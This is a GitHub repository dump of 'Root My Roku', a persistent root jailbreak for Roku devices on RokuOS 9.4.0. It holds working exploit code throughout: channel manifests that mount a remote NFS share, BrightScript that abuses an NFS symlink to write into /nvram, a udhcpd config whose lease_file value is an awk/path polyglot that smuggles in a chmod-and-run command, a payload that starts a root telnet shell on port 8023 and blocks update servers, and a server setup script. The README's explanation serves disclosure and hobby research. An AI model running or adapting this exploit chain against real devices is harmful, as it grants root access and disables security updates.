Repository: llamasoft/RootMyRoku
Branch: main
Commit: 01111ee93967
Files: 15
Total size: 31.5 KB
Directory structure:
gitextract_i6yt6_bi/
├── README.md
├── local/
│ ├── README.md
│ ├── components/
│ │ └── StatusScreen.xml
│ ├── manifest
│ └── source/
│ └── Main.brs
├── remote/
│ ├── README.md
│ ├── bootstrap.conf
│ ├── components/
│ │ ├── StatusScreen.brs
│ │ └── StatusScreen.xml
│ ├── manifest
│ ├── payload.sh
│ ├── resolv.sh
│ └── source/
│ └── Main.brs
└── server/
├── README.md
└── setup.sh
================================================
FILE CONTENTS
================================================
================================================
FILE: README.md
================================================
# Root My Roku
A persistent root jailbreak for RokuOS v9.4.0 build 4200 devices using a Realtek WiFi chip.
A big thank you to ammar2 and popeax from the [Exploitee.rs](https://exploitee.rs/) Discord for helping discover and develop this.
## Features
- Spawns a telnet server running as root on port 8023.
- Enables the low-level hardware developer mode.
- Adds many new secret screens and debug features to the main menu.
- *Blocks channel updates, firmware updates, and all communication with Roku servers.*
## Usage
1. Download any new channels you might want to use after the jailbreak.
Once you jailbreak your device, all communication with Roku's servers will be blocked.
Any channels you currently have installed should continue to work.
Please see the F.A.Q. below for details.
1. Enable [Developer Settings](https://developer.roku.com/docs/developer-program/getting-started/developer-setup.md#step-1-set-up-your-roku-device-to-enable-developer-settings) on your Roku device.
1. Download the latest `dev-channel.zip` from the [releases page](https://github.com/llamasoft/RootMyRoku/releases/latest).
1. Upload `dev-channel.zip` using the guide from the previous step.
1. Follow the prompts on screen, then reboot to jailbreak!
## Applications
* Using a Roku TV to drive ambient lighting: https://www.youtube.com/watch?v=V_enynuw-rc
([details](https://blog.ammaraskar.com/roku-tv-philips-hues/)).
## F.A.Q.
### Which devices does this affect?
Affected devices include _almost all_ Roku TVs and some Roku set-top boxes.
In theory, any Roku device running RokuOS v9.4.0 build 4200 or earlier that uses a Realtek WiFi chip is vulnerable.
You can check your current software version from Settings -> System -> About.
While it is not possible to manually check your WiFi chip manufacturer, the channel
provided for this exploit will tell you if your device is vulnerable or not.
### Can this brick my device?
No! It makes no changes to the underlying firmware that the device runs.
If anything bad happens, a [factory reset](https://support.roku.com/article/208757008) will always recover your device.
### How do I un-jailbreak my device?
You have two options:
- Factory reset your device. This will clear NVRAM and remove the jailbreak.
- Using the telnet server on port 8023, delete `/nvram/udhcpd-p2p.conf` and reboot.
### Is Roku aware of this exploit?
Some of the critical components required for the exploit chain no longer work in RokuOS v10.
The NFS mount option that is used for arbitrary file modification gets disabled,
and the service used for persistence and privilege escalation is no longer used.
While RokuOS v10 has started rolling out, many devices have not received the update yet.
### Why does the jailbreak block communication with Roku servers?
This is a precautionary measure to prevent the jailbreak from being disabled or removed.
In the past, Roku has taken some _creative_ measures to forcefully patch jailbroken devices.
One such example was an update to the screensaver channel that would check for a telnet service,
connect to it, and command it to un-root and update the device.
Unfortunately, the servers used for channel and firmware updates the same ones used
to communicate with Roku in general. Blocking updates means that no new channels can
be installed and that certain features like "My Feed" and "Search" will no longer work.
Applications that communicate with other services (e.g. YouTube, Netflix, HBO) will still work.
### How can I prevent my non-jailbroken Roku from updating?
Edit your modem/router's DNS settings to use the IP address of `dns.rootmyroku.com`.
You can find the current IP address using `nslookup`, `dig`, or [online DNS lookup tools](https://dnstools.ws/lookup/dns.rootmyroku.com/A/).
### Why should I trust the code you execute on my device?
You don't have to!
All of the files required to reproduce this exploit are available in this repo:
- The local channel used to load the remote payload is available under `local`.
- The remote payload loaded over NFS is available under `remote`.
- The script used to create the NFS and DNS servers are available under `server`.
## Exploit Details
There's two main vulnerabilities that make this exploit possible: arbitrary file modification and privilege escalation.
RokuOS actually does a decently good job at sandboxing channels to prevent them from accessing the underlying filesystem.
In addition to running as a restricted user, a software sandbox, and a chroot jail, Roku's Linux kernel has
[grsecurity patches](https://grsecurity.net/) applied. These patches mitigate common exploit techniques used in
jailbreaks and privilege escalation. Furthermore, the entire root filesystem is read-only and baked into the firmware.
Only persistent storage (NVRAM) and temp directories are writable.
### Arbitrary File Modification
Two things conspired to allow arbitrary file modification. The first was that an undocumented `pkg_nfs_mount`
[channel manifest](https://developer.roku.com/en-gb/docs/developer-program/getting-started/architecture/channel-manifest.md) option.
This option was meant to reduce the software development lifecycle when creating a channel by allowing the channel's source code
to be hosted on a different machine using [NFS](https://en.wikipedia.org/wiki/Network_File_System).
This removes the need to re-package and re-upload channels after every code change.
The second was a shortcoming of the grsecurity patches and the Linux kernel in general: symlinks over NFS act weird.
While grsecurity was configured specifically to not allow symlinking to directories owned by other users,
the ownership and permission checks no longer work properly when the symlink resides on an NFS mount.
This allows us to create a symlink in the remote channel's package that points to the root of the main filesystem.
(See [`remote/source/Main.brs`](/remote/source/Main.brs) for details.)
This provided us with the ability to modify persistent storage and temp files, but only as the app user.
### Privilege Escalation
From there, we discovered that the process that configures udhcpd (a DHCP service used for pairing speakers and remotes)
for Realtek chipsets could be made to read a config file from NVRAM, a location that the app user has access to.
If we could leverage it properly, it would let us manipulate a service running as the root user and also give us a means
of persisting across reboots. Thankfully, udhcpd has an option for executing a script (`notify_file`) with a single parameter (`lease_file`)
whenever a DHCP lease is created. It wasn't perfect though: the udhcpd service would only run the script if it has the "execute" bit set.
While we could create arbitrary files using our previous exploit, we didn't have control over the file's permissions and
as a result, none of the payload scripts we create are marked as executable. To make matters more difficult, we couldn't pass the
payload script as `lease_file` to the built-in shell executables because udhcpd would overwrite the script contents first.
Ultimately, the solution involved creating a `lease_file` value polyglot that is both an AWK script and a legal file name.
(See [`remote/bootstrap.conf`](/remote/bootstrap.conf) for details.)
## Footnote
If anyone at Roku is reading this: you desperately need a _real_ bug bounty program.
Without one, there's little incentive to research and report vulnerabilities
when you're not sure if you'll be rewarded for your efforts or not.
While we took this project on for fun as a hobby, almost no professional
security researchers are going to dedicate as much effort as we did for a "maybe".
================================================
FILE: local/README.md
================================================
This is the source code for the "local" component of the jailbreak.
When zipped and uploaded as a channel, this connects to the "remote" component of the jailbreak over NFS.
Key files:
- [`manifest`](./manifest) is the channel manifest that file enables the NFS mounting of the remote component.
- [`source/Main.brs`](./source/Main.brs) is the BrightScript file that will execute if the NFS mount fails or is patched.
================================================
FILE: local/components/StatusScreen.xml
================================================
================================================
FILE: local/manifest
================================================
title=Root My Roku
major_version=9
minor_version=4
build_version=4200
## Channel Assets
### Main Menu Icons / Channel Poster Artwork
#### Image sizes are FHD: 540x405px | HD: 290x218px | SD: 214x144px
mm_icon_focus_fhd=pkg:/images/channel-poster_fhd.png
mm_icon_focus_hd=pkg:/images/channel-poster_hd.png
mm_icon_focus_sd=pkg:/images/channel-poster_sd.png
### Splash Screen + Loading Screen Artwork
#### Image sizes are FHD: 1920x1080px | HD: 1280x720px | SD: 720x480px
splash_screen_fhd=pkg:/images/splash-screen_fhd.jpg
splash_screen_hd=pkg:/images/splash-screen_hd.jpg
splash_screen_sd=pkg:/images/splash-screen_sd.jpg
# This is where the magic happens.
# Normally Linux grsec prevents us from following symlinks to directories
# we don't own, but almost all of the grsec security checks fail when
# the symlink resides on an NFS mount.
# NOTE: pkg_nfs_mount requires an IP address, not a domain name.
# The value below is the IP address that nfs.rootmyroku.com resolves to.
pkg_nfs_mount=193.122.148.131:/exports/940E04200
================================================
FILE: local/source/Main.brs
================================================
Sub Main()
screen = CreateObject("roSGScreen")
m.port = CreateObject("roMessagePort")
screen.setMessagePort(m.port)
scene = screen.CreateScene("StatusScreen")
screen.show()
m.status = scene.FindNode("statusLabel")
m.status.text = "If you're seeing this, the NFS mount failed or the exploit was patched. :("
Stop
While True
event = wait(30000, m.port)
event_type = type(event)
If event_type = "roSGScreenEvent" Then
' When the screen is closed, shut everything down.
If event.isScreenClosed() Then
Return
End If
End If
End While
End Sub
================================================
FILE: remote/README.md
================================================
This is the source code for the "remote" component of the jailbreak. ***This is where the magic happens.***
The contents of this directory will be loaded over NFS by the "local" component.
Key files:
- [`source/Main.brs`](./source/Main.brs) is the BrightScript file that uses a symlink exploit to install the jailbreak files.
- `root` a symlink used to access the device's internal storage.
This symlink can't be checked in or uploaded properly.
If you wish to reproduce this exploit yourself, you'll need to create it manually.
(Hint: `cd remote && ln -s / root`)
- [`bootstrap.conf`](./bootstrap.conf) is the udhcpd config used to bootstrap the jailbreak process.
This file is used only once, and only to execute the jailbreak payload after the first reboot.
- [`payload.sh`](./payload.sh) is the primary jailbreak payload.
It replaces the bootstrap udhcpd config with one that allows udhcpd to continue functioning normally.
It's also responsible for enabling developer mode, the telnet server, and the Roku-blocking DNS.
- [`resolv.sh`](./resolv.sh) blocks communication with Roku servers by updating the device's DNS settings.
================================================
FILE: remote/bootstrap.conf
================================================
# udhcpd allows you to specify an executable to notify whenever the lease file is updated.
# It will call the `notify_file` executable and pass `lease_file` as the only parameter.
# However, it has a few critical limitations:
# - The `notify_file` target must have the execute bit set.
# This is actually a major hurdle.
# While we can copy/write to arbitrary files, we can't control
# the resulting file's permissions. As a consequence, the files
# we write to /nvram always never have their execute bit set.
# - udhcpd uses `execvp` to call `notify_file`, so we have access to
# exactly ONE parameter (i.e. `lease_file`) regardless of whitespace.
# This means things like `/bin/sh -c "commands to run"` won't work.
# - The contents of `lease_file` will be overwritten before calling `notify_file`.
# This means we can't use `/bin/sh /path/to/script.sh` because udhcpd
# will clobber the contents of our script before it ever gets executed.
# - The value of `lease_file` must be a path that udhcpd can write to.
# If it fails to write to `lease_file` then it won't call `notify_file`.
# The file itself doesn't need to exist in advance, but udhcpd can't
# create directories so it must be placed somewhere udhcpd can write.
# The solution is an awk script + file path polyglot:
# - Start with a pattern match (`/tmp/;`) that executes nothing.
# This makes the entire awk script look like a file path under /tmp.
# From this point on, we can no longer use front-slahes otherwise
# it will be interpreted as subdirectories.
# We work around this by creating a front-slash using sprintf
# and using string concatination to generate a system command.
# - awk normally reads input via file name arguments and/or stdin,
# but udhcpd won't be passing any additional arguments.
# This means that the core of the awk script must be inside a `BEGIN`
# block which executes before any input processing takes place.
# As a side note, we must manually exit awk. If we reach the end of
# the `BEGIN` block, it will hang when attempting to consume stdin.
# This in turn causes udhcpd to hang waiting for `notify_file` to finish.
# - Lastly, we need to manually chmod +x the exploit payload
# because the execute bit will be missing.
# Behold! (I'm actually pretty proud of this.)
notify_file /usr/bin/awk
lease_file /tmp/; BEGIN { fs=sprintf("%c",47); system("chmod +x "fs"nvram"fs"payload.sh && "fs"nvram"fs"payload.sh"); exit(0); }
# udhcpd calls `notify_file` whenever a new lease is created or every `auto_time` seconds.
# We need the exploit payload to run before Application launches.
# To accomplish this, we set the `auto_time` value to a small value
# so that it triggers very early in the boot process.
# The exploit payload will update the udhcpd config file
# so that the small `auto_time` value is only used once.
auto_time 1
# A fallback interface in case we couldn't find one during installation.
interface wlan1
# Make sure this file ends with an empty line.
# An `interface` line will be appended during startup
# and we need to make sure that it doesn't accidentally
# get appended to one of our directives.
================================================
FILE: remote/components/StatusScreen.brs
================================================
Sub init()
m.status = m.top.FindNode("status")
m.status.font.size = 36
m.spinner = m.top.FindNode("spinner")
m.spinner.poster.uri = "pkg:/images/spinner.png"
m.spinner.poster.observeField("loadStatus", "moveSpinner")
setBusyState(False)
m.top.ObserveField("text", "onTextUpdate")
m.top.ObserveField("busy", "onBusyUpdate")
m.top.SetFocus(True)
End Sub
Sub onTextUpdate(event As Object)
event_type = Type(event)
If event_type = "roSGNodeEvent" Then
m.status.text = event.GetData()
End If
End Sub
Sub moveSpinner(event As Object)
' Relocates the spinner to the bottom right corner.
' We don't have access to the spinner's dimensions until the image finishes loading.
If m.spinner.poster.loadStatus = "ready" Then
screen_right = 1280 - m.spinner.poster.bitmapWidth * 1.25
screen_bottom = 720 - m.spinner.poster.bitmapHeight * 1.25
m.spinner.translation = [screen_right, screen_bottom]
End If
End Sub
Sub onBusyUpdate(event As Object)
setBusyState(event.GetData())
End Sub
Sub setBusyState(busy As Boolean)
If busy Then
m.spinner.poster.rotation = 0
m.spinner.visible = True
m.spinner.control = "start"
Else
m.spinner.visible = False
m.spinner.control = "stop"
End If
End Sub
Sub onKeyEvent(key As String, pressed As Boolean) As Boolean
' Observe and note all witness key events.
' This is done so the main method can "observe" our lastKeyEvent field
' because the main method has no direct access to onKeyEvent calls.
m.top.lastKeyEvent = { key: key, pressed: pressed }
' Pretend like we didn't handle the key so the event propagates.
Return False
End Sub
================================================
FILE: remote/components/StatusScreen.xml
================================================
================================================
FILE: remote/manifest
================================================
title=Root My Roku
major_version=9
minor_version=4
build_version=4200
## Channel Assets
### Main Menu Icons / Channel Poster Artwork
#### Image sizes are FHD: 540x405px | HD: 290x218px | SD: 214x144px
mm_icon_focus_fhd=pkg:/images/channel-poster_fhd.png
mm_icon_focus_hd=pkg:/images/channel-poster_hd.png
mm_icon_focus_sd=pkg:/images/channel-poster_sd.png
### Splash Screen + Loading Screen Artwork
#### Image sizes are FHD: 1920x1080px | HD: 1280x720px | SD: 720x480px
splash_screen_fhd=pkg:/images/splash-screen_fhd.jpg
splash_screen_hd=pkg:/images/splash-screen_hd.jpg
splash_screen_sd=pkg:/images/splash-screen_sd.jpg
splash_color=#000000
splash_min_time=1000
================================================
FILE: remote/payload.sh
================================================
#!/bin/sh
status() { echo "[$(date)]" "$@"; }
warning() { status "$@" 1>&2; }
fail() { warning "$@"; exit 1; }
exec >>"/tmp/payload.log" 2>&1
enable_developer_mode() {
# Overlay /proc/cmdline to enable developer mode.
# This unlocks all of the busybox commands like wget and telnetd.
# If this takes place before Application starts, it also:
# - Unlocks debug and secret screens in the main menu.
# - Unlocks developer commands in the port 8080 debug terminal.
if ! grep -qF "dev=1" "/proc/cmdline"; then
status "Enabling developer mode"
cmdline=$(cat "/proc/cmdline")
printf "dev=1 %s" "${cmdline}" > "/tmp/cmdline"
chmod 644 "/tmp/cmdline"
mount -o bind,ro "/tmp/cmdline" "/proc/cmdline"
# Given that we only enable developer mode once at boot,
# take this opportunity to purge the current developer channel.
# If we don't, it'll trigger an NFS mount every boot.
# If the NFS mount fails, it can cause a boot loop.
rm "/nvram/incoming/dev.zip"* 2>/dev/null
fi
}
enable_telnetd() {
if pgrep -f telnetd >/dev/null 2>&1; then
return
fi
# Try different busybox binaries until we find one that works.
# The system one should work if the developer overlay was successful,
# but it never hurts to be careful.
telnetd_started=0
for busybox in "/bin/busybox" "/nvram/busybox" "/nvram/busybox-$(uname -m)"; do
if [[ ! -e "${busybox}" ]]; then
continue
fi
status "Starting telnetd from ${busybox}"
chmod +x "${busybox}" >/dev/null 2>&1
if "${busybox}" telnetd -l /sbin/loginsh -p 8023; then
telnetd_started=1
break
fi
done
if [[ "${telnetd_started}" -ne 1 ]]; then
warning "Failed to start telnetd :("
fi
}
enable_custom_dns() {
if pgrep -f "resolv.sh" >/dev/null 2>&1; then
return
fi
# This custom DNS blocks communication with Roku's servers.
# This disables logging, channel updates, and firmware updates.
# See `resolv.sh` for details.
status "Enabling custom DNS nameserver"
chmod +x "/nvram/resolv.sh"
nohup "/nvram/resolv.sh" >/dev/null 2>&1 &
}
enable_persistence() {
# Check if we're using the bootstrapping config file.
# If we are, we need to replace it with a fully functional one.
# This restores actual udhcpd functionality for pairing speakers,
# remotes, and other devices.
restart_udhcpd=0
script_path=$(readlink -f "$0")
if ! grep -qF "${script_path}" "/nvram/udhcpd-p2p.conf"; then
status "Replacing bootstrap udhcpd config"
{
# Base the new config file off the system default one,
# but remove and replace the `notify_file` and `auto_time` values.
grep -vF -e "notify_file" -e "auto_time" "/lib/wlan/realtek/udhcpd-p2p.conf"
# Add the current script as the `notify_file` target.
echo
echo "notify_file ${script_path}"
# Cause the `notify_file` target to be called early during boot.
# This makes sure that our payload is run before the main Application starts.
# See `bootstrap.conf` for details.
echo "auto_time 1"
# Make absolutely sure that the config file ends with an empty line.
# See `bootstrap.conf` for details.
echo
} > "/nvram/udhcpd-p2p.conf"
# udhcpd is currently running with the bootstrap config file.
# We need to recreate the active config file by simulating
# the changes made by `/lib/wlan/network-functions`.
{
cat "/nvram/udhcpd-p2p.conf"
interface_name=$(cat "/tmp/p2p-interface-name" 2>/dev/null)
if [[ -n "${interface_name}" ]]; then
echo "interface ${interface_name}"
fi
} > "/tmp/udhcpd-p2p.conf"
restart_udhcpd=1
fi
# Now that the initial payload has already run, we don't need to run as often.
# If the active config still contains an `auto_time` value, remove it.
# The default value for `auto_time` is 2 hours which is good enough.
if grep -qF "auto_time" "/tmp/udhcpd-p2p.conf"; then
status "Removing auto_time config value"
sed -i "/auto_time/d" "/tmp/udhcpd-p2p.conf"
restart_udhcpd=1
fi
if [[ "${restart_udhcpd}" -ne 0 ]]; then
# We can't `pkill udhcpd` or we'll end up killing ourselves too.
# We need to kill all instances of udhcpd except the brand new one.
current_pids=$(pgrep udhcpd)
status "Spawning replacement udhcpd"
udhcpd "/tmp/udhcpd-p2p.conf"
if [[ -n "${current_pids}" ]]; then
status "Killing previous udhcpd instances"
kill ${current_pids}
fi
fi
}
# Do our magic, then call the default udhcpd notify script.
enable_developer_mode
enable_telnetd
enable_custom_dns
# The persistence method must run last as it may restart udhcpd.
# This payload is launched by the current udhcpd, so it may kill us too.
enable_persistence
if [[ $# -gt 0 ]]; then
status "Calling default notify handler"
/lib/wlan/realtek/udhcpd-notify.sh "$@" >/dev/null 2>&1
fi
================================================
FILE: remote/resolv.sh
================================================
#!/bin/sh
status() { echo "[$(date)]" "$@"; }
warning() { status "$@" 1>&2; }
fail() { warning "$@"; exit 1; }
exec >>"/tmp/resolv.log" 2>&1
# This needs to point to a DNS server that blocks "roku.com" domains.
# Without this, system firmware updates (or even sneaky channel updates)
# can disable the persistent root jailbreak.
CUSTOM_DNS="dns.rootmyroku.com"
# Lock down the /tmp/resolv.conf file before anything else can modify it.
# This file is automatically generated once we connect to a network,
# but the process that handles it runs as the app user.
# By setting the ownership to root and disabling writes, we can prevent
# the application from overwriting our DNS settings.
touch "/tmp/resolv.conf"
chown root:root "/tmp/resolv.conf"
chmod 644 "/tmp/resolv.conf"
# If we have a `resolv.conf` saved from a previous boot,
# restore it while we check for an updated IP address.
if [[ -s "/nvram/resolv.conf" ]]; then
last_resolv=$(cat "/nvram/resolv.conf")
cp "/nvram/resolv.conf" "/tmp/resolv.conf"
status "Restored previous DNS settings:"
cat "/tmp/resolv.conf"
ls -al "/tmp/resolv.conf"
chown root:root "/tmp/resolv.conf"
chmod 644 "/tmp/resolv.conf"
else
last_resolv=""
fi
# In a perfect world we'd be able to put our custom DNS server's
# DNS name into /etc/resolv.conf and have it magically work.
# Instead, we'll ask a known-good DNS server the IP address of
# our custom DNS server so we can use that instead.
failing=0
while :; do
if ! resp=$(nslookup "${CUSTOM_DNS}" "1.1.1.1"); then
# This has a short retry delay so don't spam the logs.
if [[ "${failing}" -ne 1 ]]; then
warning "Failed to resolve ${CUSTOM_DNS}"
failing=1
fi
sleep 3
continue
fi
failing=0
resolv=$(
echo "${resp}" | sed -n '/^Name/,$p' | awk '/^Address/ { print "nameserver " $3; }'
)
if [[ -z "${resolv}" ]]; then
warning "Resolved ${CUSTOM_DNS}, but found no addresses"
sleep $(( 10 + RANDOM % 30 ))
continue
fi
if [[ "${resolv}" != "${last_resolv}" ]]; then
echo "${resolv}" > "/tmp/resolv.conf"
cp "/tmp/resolv.conf" "/nvram/resolv.conf"
last_resolv="${resolv}"
status "DNS settings updated:"
cat "/tmp/resolv.conf"
fi
# Network condition changes can cause the resolv.conf file to be reset.
# Monitor the file to ensure the contents don't revert.
delay=$(( 300 + RANDOM % 600 ))
while [[ "${delay}" -gt 0 ]]; do
if [[ "$(cat /tmp/resolv.conf)" != "${resolv}" ]]; then
status "Refreshing resolv.conf"
echo "${resolv}" > "/tmp/resolv.conf"
fi
sleep 3
delay=$(( delay - 3 ))
done
done
================================================
FILE: remote/source/Main.brs
================================================
Sub Main()
m.port = CreateObject("roMessagePort")
screen = CreateObject("roSGScreen")
screen.setMessagePort(m.port)
m.status = screen.CreateScene("StatusScreen")
screen.show()
m.spinner = m.status.FindNode("spinner")
m.status.ObserveField("lastKeyEvent", m.port)
m.status.text = "Press play to root your Roku or back to exit."
While True
event = Wait(30000, m.port)
event_type = Type(event)
If event_type = "roSGScreenEvent" Then
' When the screen is closed, shut everything down.
If event.isScreenClosed() Then
Return
End If
Else If event_type = "roSGNodeEvent" Then
If event.GetField() = "lastKeyEvent" Then
event_data = event.GetData()
key = event_data["key"]
pressed = event_data["pressed"]
If key.StartsWith("play") And pressed Then
RootMyRoku()
End If
End If
End If
End While
End Sub
Sub Halt()
m.status.busy = False
While True
Stop
Sleep(1000)
End While
End Sub
Sub RootMyRoku()
m.status.busy = True
' Verify that the magic symlink exists and works.
fs = CreateObject("roFileSystem")
If fs.Stat("pkg:/root")["type"] <> "directory" Then
m.status.text = "Sorry, root symlink missing or the exploit has been fixed. :("
Stop
Halt()
End If
' Check that the device uses the vulnerable driver stack.
wlan_driver = ReadAsciiFile("pkg:/root/tmp/wlan-driver").Trim()
If wlan_driver <> "realtek" Then
m.status.text = "WARNING: " + wlan_driver + " may not be vulnerable."
Sleep(5000)
End If
m.status.text = "Installing the exploit bootstrapper..."
Sleep(1000)
bootstrap_config = ReadAsciiFile("pkg:/bootstrap.conf")
default_config = ReadAsciiFile("pkg:/root/lib/wlan/realtek/udhcpd-p2p.conf")
For Each line in default_config.Tokenize(Chr(10))
If line.StartsWith("interface") Then
bootstrap_config = bootstrap_config + Chr(10) + line + Chr(10)
End If
End For
WriteAsciiFile("pkg:/root/nvram/udhcpd-p2p.conf", bootstrap_config)
m.status.text = "Installing the exploit payload..."
Sleep(1000)
fs.CopyFile("pkg:/payload.sh", "pkg:/root/nvram/payload.sh")
m.status.text = "Exploit ready! Please reboot to trigger the payload."
m.status.text = m.status.text + Chr(10) + "Settings -> System -> Power -> System Restart"
Halt()
End Sub
================================================
FILE: server/README.md
================================================
This is the shell script used to create and configure the NFS and DNS server used by this jailbreak.
You can use this script as a starting point if you wish to recreate the exploit yourself,
or to add extra functionality to the DNS server (e.g. ad blocking).
The shell script does _most_ of the work to set up the server, but some manual work will still be required:
- Purchasing and configuring a domain name to point to the server's IP address.
- Uploading the "remote" component to the NFS `/exports` directory.
- Creating the `root` symlink in the remote component. (Hint: `cd remote && ln -s / root`)
- Updating the local component's `manifest` file to point to the server's IP address and NFS exports path.
- Updating the remote component's `resolv.sh` file to point to the server's DNS name.
================================================
FILE: server/setup.sh
================================================
#!/usr/bin/env bash
# Once the server setup is complete, you'll still need to do a few things:
# 1. Make sure the DNS and NFS mounts are accessible from the outside world.
# Check your firewall settings and network routes.
# If all else fails: `sudo iptables -I INPUT -j ACCEPT`
# 2. Upload the "remote" portion of the channel to "/exports/940E04200"
# 3. Create the magic symlink using the following command:
# ( cd "/exports/940E04200" && ln -s "/" "./root"; )
# 4. Update the remote channel's `resolv.sh` script to point to this server.
# 5. Update the local channel's `manifest` file to point to this server's IP address.
# Tested and configured for Ubuntu LTS 20.04 Minimal.
status() { echo "[$(date)]" "$@"; }
warning() { status "$@" 1>&2; }
fail() { warning "$@"; exit 1; }
exec &> >(tee -a "/tmp/setup.log")
# Determine the current user's home directory from /etc/passwd.
# This is to work around the fact that some cloud init script
# run without a login shell.
if [[ -z "${HOME}" || -z "${USER}" ]]; then
export USER=$(id --user --name)
export HOME=$(getent passwd "${USER}" | cut -d":" -f6)
status "Setting HOME to '${HOME}'."
fi
status "Script running as ${USER}."
status "Installing some basic utilities"
packages=(
curl
dnsmasq
dnsutils
fail2ban
git
htop
iftop
iotop
jq
less
moreutils
nfs-kernel-server
rsync
rsyslog
screen
vim
)
sudo apt-get update
sudo apt-get install -y --no-install-recommends "${packages[@]}"
status "Configuring fail2ban"
sudo sed -i "" -e 's/%(sshd_backend)s/systemd/' "/etc/fail2ban/jail.conf"
sudo systemctl enable fail2ban
sudo systemctl restart fail2ban
export NFS_DIR="/exports"
status "Creating NFS export at ${NFS_DIR}"
sudo mkdir --mode=1777 -p "${NFS_DIR}"
echo "${NFS_DIR} *(ro,async,no_subtree_check,insecure)" | sudo tee "/etc/exports" &>"/dev/null"
sudo systemctl enable nfs-kernel-server
sudo systemctl restart nfs-kernel-server
status "Configuring iptables for NFS"
for port in 111 1110 2049 4045; do
for protocol in tcp udp; do
sudo iptables -I INPUT -p "${protocol}" --dport "${port}" -j ACCEPT
done
done
status "Disabling systemd-resolved"
sudo systemctl disable systemd-resolved
sudo systemctl stop systemd-resolved
cat <"/dev/null"
nameserver 1.1.1.1
nameserver 1.0.0.1
nameserver 8.8.8.8
nameserver 8.8.4.4
RESOLV
status "Configuring dnsmasq"
cat <"/dev/null"
# Don't load the host's /etc/hosts or /etc/resolv.conf
no-hosts
no-resolv
# Allow remote connections, not just local ones
interface=*
# Basic security tweaks
bogus-priv
domain-needed
# Upstream DNS servers
server=1.1.1.1
server=1.0.0.1
server=8.8.8.8
server=8.8.4.4
# Block Roku and all subdomains under it
server=/roku.com/
server=/ravm.tv/
# Allow domains which are required to test for network connectivity
server=/captive.roku.com/#
server=/cigars.roku.com/#
server=/image.roku.com/#
DNSMASQ
sudo systemctl enable dnsmasq
sudo systemctl restart dnsmasq
status "Configuring iptables for dnsmasq"
for port in 53; do
for protocol in tcp udp; do
sudo iptables -I INPUT -p "${protocol}" --dport "${port}" -j ACCEPT
done
done
status "Done"